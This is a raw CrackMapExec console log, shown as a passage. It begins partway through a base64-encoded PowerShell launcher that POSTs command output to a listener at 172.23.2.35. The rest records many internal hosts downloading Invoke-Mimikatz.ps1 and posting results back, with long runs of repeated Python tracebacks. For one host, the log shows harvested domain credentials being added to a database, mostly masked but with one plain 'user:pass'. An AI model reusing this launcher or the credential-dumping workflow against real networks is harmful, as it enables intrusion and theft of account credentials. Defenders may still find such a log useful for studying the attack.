gBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ SRV6.sometarget.com 445 SRV6 [+] Executed launcher | |
MIMIKATZ 172.28.1.41 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.2.33 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.33', 56008) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.68 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.68', 59701) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.47 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.248 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.248', 61174) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.120 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.60 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.60', 62434) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.195 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.195', 65496) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.61 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.61', 61216) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.50 [*] - - "POST / HTTP/1.1" 200 - | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\user:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\CDC01$:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\user:pass | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\Admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
DEBUG is_group_valid(groupID=1) => False | |
MIMIKATZ 172.23.3.50 TEST\NTServer\TEST\Server:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
MIMIKATZ 172.23.3.50 [+] Added 5 credential(s) to the database | |
MIMIKATZ 172.23.3.50 [*] Saved raw Mimikatz output to Mimikatz-172.23.3.50-2017-04-13_120338.log | |
MIMIKATZ 172.23.3.84 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.84', 56552) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.11 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.11', 61340) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.4.28 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.244 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.244', 52654) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.98 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.98', 52922) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.245 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.245', 51001) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.21 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.21', 51260) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.95 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.95', 57015) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.3.86 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.3.86', 58849) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.117 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.117', 52404) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.244 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.244', 63541) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.1.41 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.1.41', 51188) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.119 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.119', 63190) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.28.2.47 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.28.2.47', 59432) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.51 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.51', 54028) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.118 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.118', 58864) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.121 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.27.2.121', 50047) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.23.2.120 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.23.2.120', 57442) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
